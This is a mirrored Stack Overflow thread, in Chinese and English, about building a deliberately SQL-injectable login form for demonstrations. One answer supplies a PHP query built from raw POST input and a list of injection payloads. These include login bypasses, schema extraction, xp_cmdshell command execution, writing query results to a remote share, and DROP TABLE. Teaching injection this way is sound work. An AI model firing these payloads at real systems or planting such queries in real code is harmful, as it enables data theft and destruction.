当前位置: 文江博客话题详情

如何创建 SQL 注入测试站点

发布于 2024-11-19 10:13:17 字数 117 浏览 1 评论 0原文

我想创建一个简单的登录和注册表单,它允许我演示 SQL 注入,但目前我还无法这样做。每次我尝试使用示例表单时,SQLmap 都无法攻击它。有人可以给我一个非常简单和基本的登录和注册表单,我可以用它来演示 SQL 注入吗?

原文

I want to create a simple login and registration form, that allows me to demonstrate SQL injection, but I haven't been able to do so currently. Every time I attempt a sample form, SQLmap can't attack it. Can somebody give me a very simple and basic login and registration form that I can use to demonstrate SQL injection?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(3

爱殇璃 2024-11-26 10:13:17

只需运行最简单的不受保护的查询:

$query = "SELECT * FROM users WHERE username = ".stripslashes($_POST['username'])." AND password = ".stripslashes($_POST['password']) 尽情享受吧

!如果您尚未禁用 magic_quotes(应该如此),则可以使用 stripslashes() 部分,以避免某些自动转义;否则你将拥有最纯粹的可注入输入,只需拿起你可能在互联网上找到的任何 sql 注入并查看即可。一些例子:

' or 1=1--
' or 1--
' or 1
\" or '1'
' or 1=1--
' OR ''='
' or 'a'='a
') or ('a'='a
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'; EXEC master..sp_makewebtask \"\\10.10.1.3\share\output.html\", \"SELECT * FROM INFORMATION_SCHEMA.TABLES\"",
10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
1;DROP TABLE `users`

等等

Just run the simplest unprotected query:

$query = "SELECT * FROM users WHERE username = ".stripslashes($_POST['username'])." AND password = ".stripslashes($_POST['password'])

and enjoy! The stripslashes() part is there in case you haven't magic_quotes already disabled (as it should be), to avoid some automatic escaping; otherwise you'll have purest injectable input, just pick up any sql injection you might find on the internet and see. Some example:

' or 1=1--
' or 1--
' or 1
\" or '1'
' or 1=1--
' OR ''='
' or 'a'='a
') or ('a'='a
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'; EXEC master..sp_makewebtask \"\\10.10.1.3\share\output.html\", \"SELECT * FROM INFORMATION_SCHEMA.TABLES\"",
10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
1;DROP TABLE `users`

And so on

回复 原文
送舟行 2024-11-26 10:13:17

如果你喜欢大规模的 sql 测试,有时有一个库可以帮助我:
http://sqlmap.sourceforge.net

它运行了大量的 sqlinjections 测试并返回很棒的报告。

If you like a massive sql test, there are a library that help me sometimes:
http://sqlmap.sourceforge.net

It run a lot of sqlinjections tests and return great report.

回复 原文
云之铃。 2024-11-26 10:13:17

Google 查找一些预先存在的页面,即:

http://www.greensql.net/node/3

或者,您可以创建一个基本搜索框来搜索数据库中的表。用随机名称填充表并演示搜索如何工作以及 SQL 注入如何删除表等。

Google for some prexisting pages i.e.:

http://www.greensql.net/node/3

Alternatively, you could just create a basic search box that searches a table in DB. Fill the table with random names and demonstrate how the search works and how SQL injection can drop the table, etc.

回复 原文
~没有更多了~

关于作者

格子衫的從容

暂无简介

0 文章
0 评论
24 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

pengyangjin

文章 0 评论 0

小苏打饼

文章 0 评论 0

病女

文章 0 评论 0

mb_vBKS9whW

文章 0 评论 0

run

文章 0 评论 0

你的往事

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文